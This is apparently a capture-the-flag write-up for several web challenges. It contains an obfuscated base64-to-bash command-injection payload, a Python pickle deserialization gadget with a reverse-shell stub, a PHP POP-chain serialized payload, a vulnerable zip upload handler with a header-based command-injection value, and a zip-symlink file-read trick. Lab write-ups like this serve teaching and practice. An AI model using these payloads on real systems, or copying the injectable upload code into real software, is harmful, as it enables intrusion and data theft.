readbooks
payload
| public/*|e%22%22cho$%7BIFS%7D%22Y2F0IC9fZmxhZw%22$%7BIFS%7D|$%7BIFS%7Dba%22%22se64$%7BIFS%7D-d$%7BIFS%7D|$%7BIFS%7Db%22%22ash
pickelshop
| import base64 import pickle
class shell(object):
    # Gadget class for the pickle protocol: pickle.dumps() asks __reduce__ how to
    # rebuild the object and records the (callable, args) pair it returns, so any
    # consumer that pickle.loads() the resulting bytes ends up calling eval() on
    # the embedded string -- the command runs on the deserialising host, not here.
    # As rendered on this page the string between `echo` and `| base64 -d` is blank.
    # Defensive takeaway: never unpickle bytes from an untrusted source; use a
    # data-only format (json), or at least authenticate the blob (hmac) and
    # restrict loadable globals via a pickle.Unpickler.find_class override.
    def __reduce__(self) -> tuple:
        return (eval, ("__import__('os').system('echo | base64 -d | bash ')",))
# Serialising the gadget is what invokes __reduce__; the base64 text printed is
# the blob a vulnerable endpoint would be expected to pickle.loads().  Nothing on
# this line executes a command locally -- execution happens only where the blob
# is unpickled.
k = shell()
print(base64.b64encode(pickle.dumps(k)))
反弹shell
POPgadget
| <?php
class Fun{
    // Holds whatever the constructor leaves in $func: the array form is
    // assigned first and immediately overwritten by the string "Test::getFlag",
    // so the serialised Fun carries that string, not a Test instance.
    private $func;
    public function __construct(){
        $this->func = [new Test(),"q222"];
        $this->func="Test::getFlag";
    }
}
class Test{
    // Any call to an undefined method on a Test prints the FLAG environment
    // variable -- this is the sink the chain is trying to reach.
    public function __call($f,$p){ echo getenv("FLAG"); }
    // Runs on unserialize(); here it only prints a marker.
    public function __wakeup(){ echo "serialize me?"; }
}
class A {
    public $a;
    // Reading an undefined property of A turns into a method call, named after
    // that property, on whatever object $a holds.  The only guard is a
    // class-name denylist (/Test/); the script below stores a Fun in $a, which
    // passes it.  NOTE(review): a get_class() denylist is not a safe boundary
    // for code reachable from unserialize() -- allowlist the concrete class, or
    // avoid dynamic dispatch on attacker-reachable state.  As shown on this page
    // Fun defines no method for that call to land on; presumably the challenge
    // source has more -- confirm.
    public function __get($p){
        if(preg_match("/Test/",get_class($this->a))){
            return "No test in Prod\n";
        }
        return $this->a->$p();
    }
}
class B {
    public $p;
    // Entry point of the chain: __destruct fires when the unserialised object is
    // released, reads $this->a (never declared on B -- a dynamic property the
    // payload supplies) and then reads property $p on it, which is what reaches
    // A::__get above.  NOTE(review): the script below never assigns $b->p, so
    // as written $p is null; presumably set elsewhere -- confirm.
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}
// Wire B -> A -> Fun and emit the URL-encoded serialised form ($Test is created
// but never attached to the chain).
// NOTE(review): the str_replace bumps the declared property count of the
// serialised Fun from 1 to 2.  On some older PHP releases a count mismatch made
// unserialize() skip __wakeup(); why the bump is needed for this particular
// chain is not shown on the page -- confirm against the target's PHP version.
$Test = new Test; $Fun = new Fun; $a = new A; $b = new B; $a->a = $Fun; $b->a = $a;
$r = serialize($b); $r1 = str_replace('"Fun":1:','"Fun":2:',$r); echo urlencode($r1);
zupload-pro-plus-max-ultra
index.php
<?php
// Upload handler: GET serves the static page in ./upload, POST accepts a .zip
// and unpacks it with the system `unzip`.
// Silences every warning/notice -- including the one the undefined
// $file_destination below would otherwise raise.
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
    die(file_get_contents('./upload'));
} else if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $file = $_FILES['file'];
    $file_name = $file['name'];
    $file_tmp = $file['tmp_name'];
    $file_size = $file['size'];
    $file_error = $file['error'];
    // The extraction directory is taken straight from a request header
    // (X-Extract-To), so the client chooses it; nothing normalises it or
    // confines it to a base directory before it is used below.
    $extract_to = $_SERVER['HTTP_X_EXTRACT_TO'] ?? 'uploads/';
    // Extension check only: last dot-separated part of the client-supplied
    // name, compared with a non-strict in_array; the archive's contents are
    // never inspected.
    $file_ext = explode('.', $file_name);
    $file_ext = strtolower(end($file_ext));
    $allowed = array('zip');
    if (in_array($file_ext, $allowed)) {
        // A failed error/size check falls through silently: no response body.
        if ($file_error === 0) {
            if ($file_size <= 2097152) {
                // Shell command assembled by string concatenation with the
                // client-controlled $extract_to: command injection, on top of an
                // arbitrary extraction location.  A fix would drop the header
                // (fixed server-side directory) or at minimum escapeshellarg()
                // every operand; extracting with ZipArchive and rejecting
                // entries with '..' components or symlink attributes avoids the
                // shell entirely.
                exec('unzip ' . $file_tmp . ' -d ' . $extract_to);
                // $file_destination is never assigned, so 'url' is just the
                // client-supplied Referer with its query string stripped.
                echo json_encode(array(
                    'status' => 'ok',
                    'message' => 'File uploaded successfully',
                    'url' => preg_split('/\?/', $_SERVER['HTTP_REFERER'])[0] . $file_destination
                ));
            }
        }
    } else {
        echo json_encode(array(
            'status' => 'error',
            'message' => 'Only zip files are allowed'
        ));
    }
}
关键点在于
| $extract_to = $_SERVER['HTTP_X_EXTRACT_TO'] ?? 'uploads/';
和
| exec('unzip ' . $file_tmp . ' -d ' . $extract_to);
这里的 $extract_to 是可控的，直接拼接进命令即可执行。
| X-Extract-To: ./;cat /flag>>key.php
zupload-pro-plus-max-ultra-premium
unzip软链接
# Builds an archive whose entry "flag" is a symlink to /flag rather than file
# contents (--symlinks stores the link itself).  An extractor that recreates
# symlinks inside a web-served directory therefore exposes the link target.
# Server-side mitigation: refuse symlink entries (check each entry's external
# attributes / mode) and extract into a path that is not served directly.
touch /flag
ln -s /flag flag
zip --symlinks payload.zip flag
访问下载/uploads/flag即可